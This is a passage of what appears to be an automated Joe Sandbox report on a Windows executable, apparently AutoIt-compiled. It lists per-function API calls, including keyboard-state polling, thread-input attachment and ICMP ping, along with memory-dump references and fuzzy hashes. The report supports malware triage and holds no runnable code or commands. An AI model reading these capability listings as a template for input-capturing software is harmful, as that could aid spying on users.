                          • CoInitialize.OLE32(00000000), ref: 00777AF3
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00777B8F
                          • SHGetDesktopFolder.SHELL32(?), ref: 00777BA3
                          • CoCreateInstance.OLE32(0079FD08,00000000,00000001,007C6E6C,?), ref: 00777BEF
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00777C74
                          • CoTaskMemFree.OLE32(?,?), ref: 00777CCC
                          • SHBrowseForFolderW.SHELL32(?), ref: 00777D57
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00777D7A
                          • CoTaskMemFree.OLE32(00000000), ref: 00777D81
                          • CoTaskMemFree.OLE32(00000000), ref: 00777DD6
                          • CoUninitialize.OLE32 ref: 00777DDC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                          • String ID:
                          • API String ID: 2762341140-0
                          • Opcode ID: b02302d6b764dcdb4d356eba8aea40f541ee38c0acb65b518e12adad43defcba
                          • Instruction ID: c51e37ae4893015bcfce43af7bdb4f0a4c68132548d98a9c574775d09573e6dd
                          • Opcode Fuzzy Hash: b02302d6b764dcdb4d356eba8aea40f541ee38c0acb65b518e12adad43defcba
                          • Instruction Fuzzy Hash: 14C12A75A04209EFCB14DFA4C888DAEBBF9FF48344B148599E9199B361D734EE41CB90
                          Function 0079541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00795504
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00795515
                          • CharNextW.USER32(00000158), ref: 00795544
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00795585
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0079559B
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007955AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$CharNext
                          • String ID:
                          • API String ID: 1350042424-0
                          • Opcode ID: 68ea269d902d24f615f543aee97d011c6e18d5bec857ff8bb2e6e45e73e2c8c6
                          • Instruction ID: d4144efd9e7754c10866397a45ce64137bdc712764165a7a55448511115bbeaf
                          • Opcode Fuzzy Hash: 68ea269d902d24f615f543aee97d011c6e18d5bec857ff8bb2e6e45e73e2c8c6
                          • Instruction Fuzzy Hash: 44619F71900628EFDF12DF94EC84DFE7BB9EB05720F108145F925AB2A1D7789A81DB60
                          Function 0075FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0075FAAF
                          • SafeArrayAllocData.OLEAUT32(?), ref: 0075FB08
                          • VariantInit.OLEAUT32(?), ref: 0075FB1A
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0075FB3A
                          • VariantCopy.OLEAUT32(?,?), ref: 0075FB8D
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0075FBA1
                          • VariantClear.OLEAUT32(?), ref: 0075FBB6
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0075FBC3
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075FBCC
                          • VariantClear.OLEAUT32(?), ref: 0075FBDE
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0075FBE9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 95dc87925049094b18675cbea33ec587eff0c8d4c60b2093b031b6ea3a7c8405
                          • Instruction ID: 7b22d9331cd46bdef6464ca02f061898f1227d8cee1339765ff1f5849b513e95
                          • Opcode Fuzzy Hash: 95dc87925049094b18675cbea33ec587eff0c8d4c60b2093b031b6ea3a7c8405
                          • Instruction Fuzzy Hash: 43415F75A00219DFCF01DF68C8589EEBBB9EF08355F00C069E905A7261CB78A946CFA1
                          Function 00769C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00769CA1
                          • GetAsyncKeyState.USER32(000000A0), ref: 00769D22
                          • GetKeyState.USER32(000000A0), ref: 00769D3D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00769D57
                          • GetKeyState.USER32(000000A1), ref: 00769D6C
                          • GetAsyncKeyState.USER32(00000011), ref: 00769D84
                          • GetKeyState.USER32(00000011), ref: 00769D96
                          • GetAsyncKeyState.USER32(00000012), ref: 00769DAE
                          • GetKeyState.USER32(00000012), ref: 00769DC0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00769DD8
                          • GetKeyState.USER32(0000005B), ref: 00769DEA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 2474b1afed8430ab411974f4441de308d9e8c9537f3633646d3a5a1165687641
                          • Instruction ID: f5d31bc046defc056a1d08f4199f3254063977160d47fb6757a94daa01873af4
                          • Opcode Fuzzy Hash: 2474b1afed8430ab411974f4441de308d9e8c9537f3633646d3a5a1165687641
                          • Instruction Fuzzy Hash: 204195346047C969FF71977488043B5BEA86F11344F08806ADFC7566C2EBBD99D8CBA2
                          Function 0078055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WSOCK32(00000101,?), ref: 007805BC
                          • inet_addr.WSOCK32(?), ref: 0078061C
                          • gethostbyname.WSOCK32(?), ref: 00780628
                          • IcmpCreateFile.IPHLPAPI ref: 00780636
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007806C6
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007806E5
                          • IcmpCloseHandle.IPHLPAPI(?), ref: 007807B9
                          • WSACleanup.WSOCK32 ref: 007807BF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 70c9992d6b9baaf002146358d7fef9af833cc4a4451aae9aba7563052ffc7837
                          • Instruction ID: c7a0120e5cebd1424a696a18a00c80bfd8b2ee7e3287fa9833a82ae6be5769b3
                          • Opcode Fuzzy Hash: 70c9992d6b9baaf002146358d7fef9af833cc4a4451aae9aba7563052ffc7837
                          • Instruction Fuzzy Hash: 5091AE75648201DFDB60EF15C889F1ABBE0AF44318F1485A9F4698B6A2C738ED49CFD1
                          Function 00788CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 707087890-567219261
                          • Opcode ID: 6e7f4e3f98b52cc2fec2fb17fabca3b23e0559a9d9a376771a261ab2a4af6484
                          • Instruction ID: 1dfddc807f1dc8bcfcdcad7b18fb241a28fc89db6771fe7d7b6bea0a02011201
                          • Opcode Fuzzy Hash: 6e7f4e3f98b52cc2fec2fb17fabca3b23e0559a9d9a376771a261ab2a4af6484
                          • Instruction Fuzzy Hash: D551A131A40116DBCF54EF6CC9409BEB7A5BF64320BA04229E966E72C5DF39ED40C791
                          Function 0078372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32 ref: 00783774
                          • CoUninitialize.OLE32 ref: 0078377F
                          • CoCreateInstance.OLE32(?,00000000,00000017,0079FB78,?), ref: 007837D9
                          • IIDFromString.OLE32(?,?), ref: 0078384C
                          • VariantInit.OLEAUT32(?), ref: 007838E4
                          • VariantClear.OLEAUT32(?), ref: 00783936
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 636576611-1287834457
                          • Opcode ID: b331df95cb5817dd269c28a511193ec5ce7169e118a4304207153408085c9f50
                          • Instruction ID: 7770f843ac728c275ff6a0ce26a828f0fab50d5040a1416f170152c740f895f9
                          • Opcode Fuzzy Hash: b331df95cb5817dd269c28a511193ec5ce7169e118a4304207153408085c9f50
                          • Instruction Fuzzy Hash: 2561AFB0648301EFD711EF58C889F5AB7E4AF48B14F00490DF9859B291C778EE49CBA2
                          Function 00798B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                            • Part of subcall function 0071912D: GetCursorPos.USER32(?), ref: 00719141
                            • Part of subcall function 0071912D: ScreenToClient.USER32(00000000,?), ref: 0071915E
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000001), ref: 00719183
                            • Part of subcall function 0071912D: GetAsyncKeyState.USER32(00000002), ref: 0071919D
                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00798B6B
                          • ImageList_EndDrag.COMCTL32 ref: 00798B71
                          • ReleaseCapture.USER32 ref: 00798B77
                          • SetWindowTextW.USER32(?,00000000), ref: 00798C12
                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00798C25
                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00798CFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#}
                          • API String ID: 1924731296-1379082668
                          • Opcode ID: 771a4dd482f0806e58b9cfa0b57f749637a14222cb93a067d31ab047d7ff20ff
                          • Instruction ID: f1e2cf150c3f1dbbbdace53b19adc09c16bddf6dd5f01135b7706758e2bea850
                          • Opcode Fuzzy Hash: 771a4dd482f0806e58b9cfa0b57f749637a14222cb93a067d31ab047d7ff20ff
                          • Instruction Fuzzy Hash: C7518A71105240EFDB04DF24D86AFAA77E4BB89710F40066EF952572E2CB78A945CB62
                          Function 00773388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007733CF
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007733F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LoadString$_wcslen
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                          • API String ID: 4099089115-3080491070
                          • Opcode ID: 793f70bca7254a21e338416a88a1f8aba05ba68bc58b5b07346ec15886699b8d
                          • Instruction ID: aa51ea5d01d598275fa91dea30586a66d44d85e1edf511e47c8c8d3dc850a316
                          • Opcode Fuzzy Hash: 793f70bca7254a21e338416a88a1f8aba05ba68bc58b5b07346ec15886699b8d
                          • Instruction Fuzzy Hash: 8B5171B1900209FADF15EBA0CD4AEEEB7B8AF04340F508165F50972092EB3D6F58DB60
                          Function 0076B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharUpper
                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                          • API String ID: 1256254125-769500911
                          • Opcode ID: e8216b14bb635e1dc2f6943b70f9067b20c48e4fce588913460aab460b248a9d
                          • Instruction ID: 9111635bd56c85edba8e26b66429aa0cd1fe4117225a41069758eb6e418004d3
                          • Opcode Fuzzy Hash: e8216b14bb635e1dc2f6943b70f9067b20c48e4fce588913460aab460b248a9d
                          • Instruction Fuzzy Hash: 8B41D832A00126DBCB105F7DC9905BE77A5AFA2754B24422AEC63D7284E739DDC1C790
                          Function 00775393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 007753A0
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00775416
                          • GetLastError.KERNEL32 ref: 00775420
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 007754A7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 8be2f8123a43640b06fe00de86a36e6f59a33095f815925aeedad927aee3767b
                          • Instruction ID: af0864432465c63b1930fb141332c55fa70db03dbd663425b4af44c4609245f5
                          • Opcode Fuzzy Hash: 8be2f8123a43640b06fe00de86a36e6f59a33095f815925aeedad927aee3767b
                          • Instruction Fuzzy Hash: 9D319075A00544DFDF10DF68C488EAA7BB4EF05345F14C169E50ACB292DBB9DD82CBA1
                          Function 00793C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                          Download Yara Rule
                          APIs
                          • CreateMenu.USER32 ref: 00793C79
                          • SetMenu.USER32(?,00000000), ref: 00793C88
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00793D10
                          • IsMenu.USER32(?), ref: 00793D24
                          • CreatePopupMenu.USER32 ref: 00793D2E
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00793D5B
                          • DrawMenuBar.USER32 ref: 00793D63
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                          • String ID: 0$F
                          • API String ID: 161812096-3044882817
                          • Opcode ID: 2e576dcd6a6ef02a3599bb5f3eeae7fd9af68f667e8f6314f9a407212d6858a6
                          • Instruction ID: 6ae320447d9ef1072051239ab43df6cf57631a2721b709882c81d3eea7a100a6
                          • Opcode Fuzzy Hash: 2e576dcd6a6ef02a3599bb5f3eeae7fd9af68f667e8f6314f9a407212d6858a6
                          • Instruction Fuzzy Hash: 77419CB4A01209EFDF14CFA4E854EAA7BB5FF49300F144029F90697360D738AA10CF94
                          Function 00793A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00793A9D
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00793AA0
                          • GetWindowLongW.USER32(?,000000F0), ref: 00793AC7
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00793AEA
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00793B62
                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00793BAC
                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00793BC7
                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00793BE2
                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00793BF6
                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00793C13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow
                          • String ID:
                          • API String ID: 312131281-0
                          • Opcode ID: 566b7a95fa08955db2acb50a9dd4abbe4b255811645e043bec83866e39ae4851
                          • Instruction ID: 91c06b7cbcb218dbfac336c2110ec729cd2bfb0a0c16ef55cdce3c44152e9bfa
                          • Opcode Fuzzy Hash: 566b7a95fa08955db2acb50a9dd4abbe4b255811645e043bec83866e39ae4851
                          • Instruction Fuzzy Hash: 33618D75900248AFDF10DFA8DC81EEE77F8EB09700F10419AFA15A7292C778AE41DB60
                          Function 0076B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0076B151
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B165
                          • GetWindowThreadProcessId.USER32(00000000), ref: 0076B16C
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B17B
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0076B18D
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1A6
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1B8
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B1FD
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B212
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0076A1E1,?,00000001), ref: 0076B21D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 371782bd641f54103b84ba9e6acc29c49b564ad6edcc7e8ee583bdee30cdffb7
                          • Instruction ID: 0662687e7550a396188cc2f0d647ab8ca77797f13559ba8da457446941a4c448
                          • Opcode Fuzzy Hash: 371782bd641f54103b84ba9e6acc29c49b564ad6edcc7e8ee583bdee30cdffb7
                          • Instruction Fuzzy Hash: 4F319171500204BFDF129F64DC59B6E7BBABB52311F10C016FE02EA290D7BC9A818F69
                          Function 00732C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 00732C94
                            • Part of subcall function 007329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000), ref: 007329DE
                            • Part of subcall function 007329C8: GetLastError.KERNEL32(00000000,?,0073D7D1,00000000,00000000,00000000,00000000,?,0073D7F8,00000000,00000007,00000000,?,0073DBF5,00000000,00000000), ref: 007329F0
                          • _free.LIBCMT ref: 00732CA0
                          • _free.LIBCMT ref: 00732CAB
                          • _free.LIBCMT ref: 00732CB6
                          • _free.LIBCMT ref: 00732CC1
                          • _free.LIBCMT ref: 00732CCC
                          • _free.LIBCMT ref: 00732CD7
                          • _free.LIBCMT ref: 00732CE2
                          • _free.LIBCMT ref: 00732CED
                          • _free.LIBCMT ref: 00732CFB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
